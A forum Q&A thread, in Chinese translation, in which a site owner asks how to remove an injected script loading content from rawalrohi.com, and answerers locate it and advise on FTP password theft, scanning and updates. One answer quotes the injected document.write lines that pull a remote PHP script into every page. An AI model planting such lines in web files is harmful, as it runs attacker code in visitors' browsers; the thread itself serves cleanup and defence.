我们的静态html网站http://www.iffort.com的主页正在从一个神秘的网站rawalrohi.com传输数据。你可以通过访问iffort.com并注意那里的页脚来检查这一点。它说从rawalrohi.com传输数据。
从我们这方面,我们做了以下事情来纠正这个问题
a。)分析所有页面的源代码。我们检查了代码,发现在所有页面中都插入了一个脚本src = http://rawalrohi.com/images/ART.php。我们从网站的所有“html”页面中删除了此脚本
b。)接下来我们与托管公司进行了交谈,他们说他们可以为我们提供该网站的备份。我们有备份但没有用它来恢复网站。
c。)最后,我们更改了FTP密码,因为我们被告知有人可能已经破解了我们的FTP密码。
尽管如此,主页仍然表示从rawalrohi.com传输数据。视图源不会显示URL。这减缓了我们的网站。
非常感谢任何帮助。
答案 0 :(得分:3)
您的页面引用了一个名为“js / hyperlinked_Images.js”的文件 看看这个文件,就在底部附近:
...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
现在,如果你能原谅我,我会去我的系统上进行快速AV扫描;)
答案 1 :(得分:1)
确保您没有使用一个FTP帐户,控制FTP用户控制,它将帮助您管理您的网站。
答案 2 :(得分:1)
我曾经见过类似的行为。在这种特定情况下,ftp密码遭到破坏:它是通过收集存储的ftp密码的恶意软件从客户端桌面PC读取的。
我们只是在密码更改并在几天内再次遭到入侵后才发现这一点。
因此,请确保使用合适的AV扫描仪扫描所有“知道”ftp密码的机器。
答案 3 :(得分:0)
我最近在客户网站上看到了这个,不同的网址,但是在所有文件中注入了相同类型的代码。为了解决这个问题,我下载了该网站,并使用Visual Studio在字符串上进行全站点“查找和替换”。这解决了我的问题。我建议你为所有文件做类似的事情,你可能错过了一个。我的客户网站有html / htm / aspx文件都被感染了,ISP做了同样的声明,FTP密码可能已被泄露......
答案 4 :(得分:0)
确保您使用的是防病毒软件。每当您的网站加载有趣的外部脚本(如广告软件,间谍软件)时,您的防病毒软件都会提醒您。
答案 5 :(得分:0)
我没有扫描您的网站,但如果您在网站上使用任何标准软件,例如:WordPress,Drupal,Joomla等,那么您需要始终保持更新。订阅他们的安全警报,每当您看到更新时,请删除您正在执行和更新的所有内容。
黑客不断在互联网上搜索易受攻击的网站。在易受攻击的网站上只需要几分之一秒即可感染它。
此外,还要更新所有插件,附加组件,组件,模块,贡献等。
否则,你会一遍又一遍地清理它。